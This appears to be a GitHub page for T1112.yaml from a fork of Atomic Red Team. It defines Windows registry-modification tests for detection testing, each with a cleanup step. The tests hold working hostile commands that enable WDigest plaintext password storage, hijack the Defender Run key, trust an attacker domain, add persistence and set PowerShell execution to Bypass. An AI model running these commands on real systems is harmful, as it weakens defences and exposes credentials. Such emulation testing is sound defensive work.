forked from redcanaryco/atomic-red-team
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathT1112.yaml
111 lines (109 loc) · 5.58 KB
/
T1112.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
attack_technique: T1112
display_name: Modify Registry
atomic_tests:
- name: Modify Registry of Current User Profile - cmd
auto_generated_guid: 1324796b-d0f6-455a-b4ae-21ffee6aa6b9
description: |
Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
supported_platforms:
- windows
executor:
command: |
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
cleanup_command: |
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: Modify Registry of Local Machine - cmd
auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe
description: |
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
supported_platforms:
- windows
input_arguments:
new_executable:
description: New executable to run on startup instead of Windows Defender
type: string
default: calc.exe
executor:
command: |
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
cleanup_command: |
reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: Modify registry to store logon credentials
auto_generated_guid: c0413fb5-33e2-40b7-9b6f-60b29f4a7a18
description: |
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Upon execution, the message "The operation completed successfully." will be displayed.
Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
supported_platforms:
- windows
executor:
command: |
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
cleanup_command: |
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: Add domain to Trusted sites Zone
auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57
description: |
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
Upon execution, details of the new registry entries will be displayed.
Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
supported_platforms:
- windows
input_arguments:
bad_domain:
description: Domain to add to trusted site zone
type: String
default: bad-domain.com
executor:
command: |
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
$name ="bad-subdomain"
new-item $key -Name $name -Force
new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
new-itemproperty $key$name -Name http -Value 2 -Type DWORD;
new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
cleanup_command: |
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
Remove-item $key -Recurse -ErrorAction Ignore
name: powershell
- name: Javascript in registry
auto_generated_guid: 15f44ea9-4571-4837-be9e-802431a7bfae
description: |
Upon execution, a javascript block will be placed in the registry for persistence.
Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
supported_platforms:
- windows
executor:
command: |
New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "<script>"
cleanup_command: |
Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -ErrorAction Ignore
name: powershell
- name: Change Powershell Execution Policy to Bypass
auto_generated_guid: f3a6cceb-06c9-48e5-8df8-8867a6814245
description: |
Attackers need to change the powershell execution policy in order to run their malicious powershell scripts.
They can either specify it during the execution of the powershell script or change the registry value for it.
supported_platforms:
- windows
input_arguments:
default_execution_policy:
description: Specify the default poweshell execution policy
type: String
default: Default
executor:
command: |
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine
cleanup_command: |
Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope LocalMachine
name: powershell